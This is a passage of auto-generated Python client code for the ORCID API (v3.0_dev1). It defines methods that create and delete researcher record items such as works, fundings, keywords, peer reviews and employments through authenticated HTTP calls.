_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_funding_json(self, orcid, **kwargs):
"""
Create a Funding
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_funding_json(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param Funding body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_funding_json_with_http_info(orcid, **kwargs)
else:
(data) = self.create_funding_json_with_http_info(orcid, **kwargs)
return data
def create_funding_json_with_http_info(self, orcid, **kwargs):
"""
Create a Funding
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_funding_json_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param Funding body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_funding_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `create_funding_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/funding'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_group_id_record_json(self, **kwargs):
"""
Create a Group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_group_id_record_json(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param GroupIdRecord body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_group_id_record_json_with_http_info(**kwargs)
else:
(data) = self.create_group_id_record_json_with_http_info(**kwargs)
return data
def create_group_id_record_json_with_http_info(self, **kwargs):
"""
Create a Group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_group_id_record_json_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param GroupIdRecord body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_group_id_record_json" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/v3.0_dev1/group-id-record'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_keyword_json(self, orcid, **kwargs):
"""
Add keyword
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_keyword_json(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param Keyword body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_keyword_json_with_http_info(orcid, **kwargs)
else:
(data) = self.create_keyword_json_with_http_info(orcid, **kwargs)
return data
def create_keyword_json_with_http_info(self, orcid, **kwargs):
"""
Add keyword
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_keyword_json_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param Keyword body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_keyword_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `create_keyword_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/keywords'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_other_name_json(self, orcid, **kwargs):
"""
Add other name
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_other_name_json(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param OtherName body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_other_name_json_with_http_info(orcid, **kwargs)
else:
(data) = self.create_other_name_json_with_http_info(orcid, **kwargs)
return data
def create_other_name_json_with_http_info(self, orcid, **kwargs):
"""
Add other name
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_other_name_json_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param OtherName body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_other_name_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `create_other_name_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/other-names'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_peer_review_json(self, orcid, **kwargs):
"""
Create a Peer Review
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_peer_review_json(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param PeerReview body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_peer_review_json_with_http_info(orcid, **kwargs)
else:
(data) = self.create_peer_review_json_with_http_info(orcid, **kwargs)
return data
def create_peer_review_json_with_http_info(self, orcid, **kwargs):
"""
Create a Peer Review
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_peer_review_json_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param PeerReview body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_peer_review_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `create_peer_review_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/peer-review'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_researcher_url_json(self, orcid, **kwargs):
"""
Add a new researcher url for an ORCID ID
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_researcher_url_json(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param ResearcherUrl body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_researcher_url_json_with_http_info(orcid, **kwargs)
else:
(data) = self.create_researcher_url_json_with_http_info(orcid, **kwargs)
return data
def create_researcher_url_json_with_http_info(self, orcid, **kwargs):
"""
Add a new researcher url for an ORCID ID
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_researcher_url_json_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param ResearcherUrl body:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_researcher_url_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `create_researcher_url_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/researcher-urls'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_work_json(self, orcid, **kwargs):
"""
Create a Work
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_work_json(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param Work body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_work_json_with_http_info(orcid, **kwargs)
else:
(data) = self.create_work_json_with_http_info(orcid, **kwargs)
return data
def create_work_json_with_http_info(self, orcid, **kwargs):
"""
Create a Work
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_work_json_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param Work body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_work_json" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `create_work_json`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/work'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_works(self, orcid, **kwargs):
"""
Create a listo of Work
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_works(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param WorkBulk body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_works_with_http_info(orcid, **kwargs)
else:
(data) = self.create_works_with_http_info(orcid, **kwargs)
return data
def create_works_with_http_info(self, orcid, **kwargs):
"""
Create a listo of Work
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_works_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param WorkBulk body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_works" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `create_works`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/works'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_address(self, orcid, put_code, **kwargs):
"""
Delete an address
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_address(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_address_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.delete_address_with_http_info(orcid, put_code, **kwargs)
return data
def delete_address_with_http_info(self, orcid, put_code, **kwargs):
"""
Delete an address
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_address_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_address" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `delete_address`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `delete_address`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/address/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_education(self, orcid, put_code, **kwargs):
"""
Delete an Education
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_education(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_education_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.delete_education_with_http_info(orcid, put_code, **kwargs)
return data
def delete_education_with_http_info(self, orcid, put_code, **kwargs):
"""
Delete an Education
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_education_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_education" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `delete_education`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `delete_education`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/education/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_employment(self, orcid, put_code, **kwargs):
"""
Delete an Employment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_employment(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_employment_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.delete_employment_with_http_info(orcid, put_code, **kwargs)
return data
def delete_employment_with_http_info(self, orcid, put_code, **kwargs):
"""
Delete an Employment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_employment_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_employment" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `delete_employment`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `delete_employment`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/employment/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_external_identifier(self, orcid, put_code, **kwargs):
"""
Delete external identifier
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_external_identifier(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_external_identifier_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.delete_external_identifier_with_http_info(orcid, put_code, **kwargs)
return data
def delete_external_identifier_with_http_info(self, orcid, put_code, **kwargs):
"""
Delete external identifier
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_external_identifier_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
